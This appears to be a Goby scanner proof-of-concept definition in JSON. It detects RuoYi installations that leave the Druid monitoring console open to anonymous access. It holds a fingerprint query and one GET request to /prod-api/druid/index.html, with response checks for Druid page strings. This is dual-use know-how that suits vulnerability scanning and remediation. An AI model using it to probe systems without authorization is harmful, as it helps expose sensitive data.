{ "Name": "RuoYi Druid Unauthorized access", "Level": "0", "Tags": [ "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"ruoyi-System\"", "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", "Product": "RuoYi", "Homepage": "https://gitee.com/y_project/RuoYi-Vue", "Author": "PeiQi", "Impact": "

 resulting in unauthorized access to sensitive information

", "Recommandation": "", "References": [ "http://wiki.peiqi.tech" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/prod-api/druid/index.html", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Druid Stat Index", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "View JSON API", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-04-20 23:13:54", "GobyVersion": "1.8.258" }